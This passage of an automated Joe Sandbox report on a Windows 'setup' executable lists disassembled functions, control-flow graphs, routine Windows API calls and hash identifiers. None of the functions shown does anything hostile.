                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcProcess
                                                                                                                                                                              • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                                                                                              • API String ID: 1850716914-3583743485
                                                                                                                                                                              • Opcode ID: 01eaf0f576f914458d126d1959810686bb6b74adb398f754b66b56d53e5a7ed4
                                                                                                                                                                              • Instruction ID: c2669d488fa3aa0ae58072d52efb8afb448600c58d8726c738fadc3ff40ea3fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 01eaf0f576f914458d126d1959810686bb6b74adb398f754b66b56d53e5a7ed4
                                                                                                                                                                              • Instruction Fuzzy Hash: 9791A1B1900328AEDB20CF21CC45B9AB7B5FB45710F0442A6E919B7290DB76AE98CF50
                                                                                                                                                                              Function 00D7F694 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 150 d7f694-d7f69f 151 d7f6a1-d7f6ad DecodePointer 150->151 152 d7f6ae-d7f6c5 LoadLibraryExA 150->152 153 d7f6c7-d7f6dc call d7f744 152->153 154 d7f73f 152->154 153->154 158 d7f6de-d7f6f3 call d7f744 153->158 155 d7f741-d7f743 154->155 158->154 161 d7f6f5-d7f70a call d7f744 158->161 161->154 164 d7f70c-d7f721 call d7f744 161->164 164->154 167 d7f723-d7f73d DecodePointer 164->167 167->155
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6A6
                                                                                                                                                                              • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6BB
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F737
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                              • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                              • API String ID: 1423960858-1745123996
                                                                                                                                                                              • Opcode ID: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction ID: 1878a13fe61e8571abf206f3c1c0bd547a3537c80196add050e96419a8ab82b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B01C4317493007ADE2D5B109D47BE977548F12744F284070FC48BB2D6E6918589D2B5
                                                                                                                                                                              Function 00CF1870 Relevance: 9.4, APIs: 6, Instructions: 403fileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 178 cf1870-cf18b5 179 cf195d-cf1970 178->179 180 cf18bb-cf18e0 SetFilePointer 178->180 181 cf18e6-cf191d GetLastError call ccef90 call ccbee0 180->181 182 cf1971-cf1995 call baacf0 180->182 194 cf191f 181->194 195 cf1922-cf194e call cdbe90 181->195 187 cf1caf-cf1cb4 call baa9b0 182->187 188 cf199b-cf19c9 182->188 192 cf1cb9-cf1d1c call baa9b0 187->192 197 cf19cf 188->197 198 cf1b75 188->198 207 cf1d1e-cf1d21 192->207 208 cf1d26-cf1d34 192->208 194->195 204 cf1958 195->204 205 cf1950-cf1953 195->205 202 cf19d2-cf19ec ReadFile 197->202 200 cf1b77-cf1bb0 call d80416 198->200 215 cf1bba-cf1bcf 200->215 216 cf1bb2-cf1bb5 200->216 209 cf19f2-cf19f6 202->209 210 cf1c31-cf1c6d GetLastError call ccef90 call ccbee0 202->210 204->179 205->204 207->208 209->210 213 cf19fc-cf19fe 209->213 227 cf1c6f 210->227 228 cf1c72-cf1c83 call cdbe90 210->228 217 cf1a10-cf1a22 call cc7d50 213->217 218 cf1a00-cf1a09 call d80416 213->218 216->215 225 cf1a28-cf1a43 ReadFile 217->225 226 cf1c27-cf1c2c 217->226 218->217 229 cf1a49-cf1a4d 225->229 230 cf1bd0-cf1c0c GetLastError call ccef90 call ccbee0 225->230 226->200 227->228 238 cf1c86-cf1c9b 228->238 229->230 232 cf1a53-cf1a6a 229->232 256 cf1c0e 230->256 257 cf1c11-cf1c25 call cdbe90 230->257 235 cf1a6c-cf1a76 232->235 236 cf1ac3-cf1ad8 232->236 241 cf1a8f-cf1a91 235->241 242 cf1a78-cf1a86 235->242 239 cf1ada-cf1b15 call baa4e0 236->239 240 cf1b18-cf1b1c 236->240 244 cf1c9d-cf1ca0 238->244 245 cf1ca5-cf1caa 238->245 239->240 247 cf1b1f-cf1b24 240->247 249 cf1a9d-cf1aa2 241->249 250 cf1a93-cf1a9b 241->250 242->187 248 cf1a8c 242->248 244->245 245->200 247->192 253 cf1b2a-cf1b2d 247->253 248->241 249->247 255 cf1aa4-cf1aa9 249->255 254 cf1aab-cf1ab9 call d89ca4 250->254 253->192 258 cf1b33-cf1b3a 253->258 254->247 265 cf1abb-cf1ac1 254->265 255->247 255->254 256->257 257->238 263 cf1b3c-cf1b3e 258->263 264 cf1b40-cf1b42 258->264 266 cf1b54-cf1b6f call baa830 263->266 267 cf1b45-cf1b4e 264->267 265->236 266->198 266->202 267->267 268 cf1b50-cf1b52 267->268 268->266
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,02141699,00000000), ref: 00CF18D7
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF1BD0
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF1C31
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF18E6
                                                                                                                                                                                • Part of subcall function 00CCEF90: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                                • Part of subcall function 00CCEF90: GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00CF19E4
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00CF1A3B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3903527278-0
                                                                                                                                                                              • Opcode ID: a95d914489f5b840fcb1965742067735df475ff4d07c13ba717f7ceb20463049
                                                                                                                                                                              • Instruction ID: 6c7ccc8bd73878854f9be22d21891e6b0c959b0693a39f884a5ff0f1964303fe
                                                                                                                                                                              • Opcode Fuzzy Hash: a95d914489f5b840fcb1965742067735df475ff4d07c13ba717f7ceb20463049
                                                                                                                                                                              • Instruction Fuzzy Hash: 26F19FB1D00609DFDB04CFA8C841BEDBBB5FF49320F188259E925A7391E774AA44CB91
                                                                                                                                                                              Function 00D119E0 Relevance: 9.3, APIs: 6, Instructions: 308synchronizationthreadCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 271 d119e0-d11a16 272 d11a46-d11a7c CreateThread 271->272 273 d11a18-d11a2b CreateEventW 271->273 274 d11a82-d11a94 272->274 275 d11b5d-d11b88 WaitForSingleObject GetExitCodeThread 272->275 276 d11a39-d11a41 273->276 277 d11a2d-d11a36 273->277 278 d11ad1-d11ada 274->278 279 d11a96-d11a9c 274->279 280 d11b98-d11bab 275->280 281 d11b8a-d11b91 CloseHandle 275->281 276->272 277->276 283 d11add-d11afa 278->283 282 d11aa0-d11aa2 279->282 281->280 285 d11aa8-d11aaa 282->285 286 d11bae-d11bef call baa9b0 282->286 287 d11b40-d11b55 283->287 288 d11afc 283->288 285->286 289 d11ab0-d11acd 285->289 299 d11bf1-d11bf4 WaitForSingleObject 286->299 300 d11bfa-d11c11 286->300 298 d11b5a 287->298 291 d11b00-d11b02 288->291 289->282 293 d11acf 289->293 291->286 295 d11b08-d11b0a 291->295 293->283 295->286 297 d11b10-d11b17 295->297 297->286 301 d11b1d-d11b23 297->301 298->275 299->300 302 d11c13-d11c18 300->302 303 d11c48-d11c58 300->303 301->286 304 d11b29-d11b3e 301->304 307 d11d7c-d11d99 call baa9b0 call d11bc0 302->307 308 d11c1e-d11c21 302->308 305 d11d65 303->305 306 d11c5e 303->306 304->287 304->291 310 d11d68-d11d7b 305->310 309 d11c60-d11c65 306->309 308->307 312 d11c27-d11c30 call cf0ce0 308->312 309->307 314 d11c6b-d11c6e 309->314 317 d11c35-d11c3c 312->317 314->307 318 d11c74-d11c82 314->318 320 d11d53 317->320 321 d11c42-d11c46 317->321 322 d11c84-d11c94 318->322 323 d11c97-d11cf5 318->323 325 d11d56-d11d5c 320->325 321->302 321->303 322->323 330 d11cf7-d11d08 323->330 331 d11d0a-d11d0d 323->331 325->310 326 d11d5e-d11d60 325->326 326->305 333 d11d0f-d11d18 330->333 332 d11d32-d11d38 331->332 331->333 336 d11d3a-d11d3d 332->336 337 d11d3f-d11d47 332->337 333->309 335 d11d1e-d11d31 333->335 336->337 338 d11d49-d11d51 336->338 337->325 338->325
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,02141699,?,00000000,?,?,?,?,?,?,00000000,00DF9C2D,000000FF), ref: 00D11A20
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00D11D90,?,00000000,?), ref: 00D11A56
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00D11B60
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 00D11B6B
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D11B8B
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,02141699,?,?,?), ref: 00D11BF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateObjectSingleThreadWait$AllocateCloseCodeEventExitHandleHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3066744267-0
                                                                                                                                                                              • Opcode ID: 94063a7ac1b9620901ef248b72b9005d99eeafa7e7f39dd242dee818d43267da
                                                                                                                                                                              • Instruction ID: d654b3e1152b69b42f0caa579c5bf2b0990ee39874f6d462ba3e476d1ceba149
                                                                                                                                                                              • Opcode Fuzzy Hash: 94063a7ac1b9620901ef248b72b9005d99eeafa7e7f39dd242dee818d43267da
                                                                                                                                                                              • Instruction Fuzzy Hash: 27C18D75A00216EFCB14CF68D984BAEBBF5FF49710F258259E915AB351DB30E841CBA0
                                                                                                                                                                              Function 00BB9F0B Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 407 bb9f0b-bb9f14 408 bb9f2c-bb9f5e GetWindowLongW CallWindowProcW 407->408 409 bb9f16-bb9f2a CallWindowProcW 407->409 411 bb9f7b 408->411 412 bb9f60-bb9f6b GetWindowLongW 408->412 410 bb9f7f-bb9f84 409->410 414 bb9faf-bb9fbd 410->414 415 bb9f86-bb9f88 410->415 411->410 412->411 413 bb9f6d-bb9f75 SetWindowLongW 412->413 413->411 415->414 416 bb9f8a-bb9fac 415->416
                                                                                                                                                                              APIs
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00BB9F20
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00BB9F35
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00BB9F4B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00BB9F65
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 00BB9F75
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$CallProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 513923721-0
                                                                                                                                                                              • Opcode ID: 060001586a6c936e02cb8d8e88b18460098e1ac977b6de81cd6b258f65478d85
                                                                                                                                                                              • Instruction ID: a4036fc804f633a743e85b64bed0d2ee8f304f4890e08666356149a4da59425a
                                                                                                                                                                              • Opcode Fuzzy Hash: 060001586a6c936e02cb8d8e88b18460098e1ac977b6de81cd6b258f65478d85
                                                                                                                                                                              • Instruction Fuzzy Hash: 8C212C72104700AFC7209F29DC8496BBBF1FB89360B104A2EF59AD2671C772F8559B50
                                                                                                                                                                              Function 00D1F650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 418 d1f650-d1f69b 419 d1f69d 418->419 420 d1f69f-d1f6bd CreateFileW 418->420 419->420 421 d1f6cb-d1f71d call bc2200 call d820e0 420->421 422 d1f6bf-d1f6c8 420->422 429 d1f720-d1f738 421->429 422->421 431 d1f757-d1f766 429->431 432 d1f73a-d1f755 WriteFile 429->432 433 d1f7a6-d1f7b9 431->433 434 d1f768-d1f775 431->434 432->429 432->431 435 d1f7c9-d1f7dc 433->435 436 d1f7bb-d1f7c2 CloseHandle 433->436 437 d1f787-d1f79f call d7fd63 434->437 438 d1f777-d1f785 434->438 436->435 437->433 438->437 439 d1f7dd-d1f7e2 call d851ef 438->439
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,02141699,?,6CCF37E0,?), ref: 00D1F6B2
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,?,0000C800), ref: 00D1F748
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,0000C800), ref: 00D1F7BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1065093856-1452845052
                                                                                                                                                                              • Opcode ID: 3f564c1631d5aa0d8d4e685f0ddd7ce2af58a5f818cb93b44ae99aa7c07b96be
                                                                                                                                                                              • Instruction ID: 9c4792000a36b0af38d052b6e8c4e78be67595000418ef1a9aa8a2acca48892c
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f564c1631d5aa0d8d4e685f0ddd7ce2af58a5f818cb93b44ae99aa7c07b96be
                                                                                                                                                                              • Instruction Fuzzy Hash: D0515A71900208AFDF14DFA5DD45BEEBBB9FF48314F24826AE400B7290DB755A44CB64
                                                                                                                                                                              Function 00CB08F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 524 cb08f0-cb0925 525 cb096a-cb0988 524->525 526 cb0927-cb093b call d80260 524->526 526->525 529 cb093d-cb0944 call cb0a00 526->529 531 cb0949-cb0967 call d80118 call d80216 529->531 531->525
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CB0962
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                              • String ID: h
                                                                                                                                                                              • API String ID: 2296764815-3790492082
                                                                                                                                                                              • Opcode ID: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction ID: 8ea8216e7fc8e76fe41194ddebfe873f97289ae1f71ca568da1c1879b515122a
                                                                                                                                                                              • Opcode Fuzzy Hash: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction Fuzzy Hash: 2301D4B1E04648DFC758EB59EC42B49B3A8E70EB20F24427AE426E33D0D735F9049A21
                                                                                                                                                                              Function 00CCF980 Relevance: 3.2, APIs: 2, Instructions: 186windowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 536 ccf980-ccf9b9 537 ccfaec call ba7d00 536->537 538 ccf9bf-ccf9d9 536->538 544 ccfaf1 call ba8830 537->544 540 ccf9db-ccf9e3 538->540 541 ccfa07-ccfa1a 538->541 545 ccf9e8-ccf9f3 call d7fd94 540->545 542 ccfa2c-ccfa2e 541->542 543 ccfa1c-ccfa24 541->543 547 ccfa30-ccfa41 call d7fd94 542->547 548 ccfa43 542->548 543->544 546 ccfa2a 543->546 553 ccfaf6-ccfb6a call d851ef call ccf120 * 2 SendMessageW * 2 544->553 545->553 558 ccf9f9-ccfa05 545->558 546->545 556 ccfa48-ccfa86 call d820e0 call d81b60 547->556 552 ccfa45 548->552 552->556 567 ccfa88-ccfa93 556->567 568 ccfab1-ccfad2 556->568 558->552 570 ccfa95-ccfaa3 567->570 571 ccfaa7-ccfaae call d7fd63 567->571 570->553 573 ccfaa5 570->573 571->568 573->571
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00CCFB54
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCFB5F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 51274aa91a6a2e53d5655ac03aa0aca4dd3d83236cc12c5494476ec920006c5c
                                                                                                                                                                              • Instruction ID: 36f591e9d807a5dbde62bb74558b5f8dab2d9234d4212bff62b17f7aee668486
                                                                                                                                                                              • Opcode Fuzzy Hash: 51274aa91a6a2e53d5655ac03aa0aca4dd3d83236cc12c5494476ec920006c5c
                                                                                                                                                                              • Instruction Fuzzy Hash: FC51A671A001149FDB14DF68CC85B6EFBA9EB85750F24427EE819DB385EA70AD0587E0
                                                                                                                                                                              Function 00C68B80 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000004), ref: 00C68BCA
                                                                                                                                                                              • DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 00C68BD7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Destroy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3707531092-0
                                                                                                                                                                              • Opcode ID: fc9c3770ff1350a2d644025c1313e9491fced6c14e69f17c577ac61358fdbbbb
                                                                                                                                                                              • Instruction ID: 15aa4f3498b644e51add9e869079975253b9a6d11a3b8e9976a132556b525e77
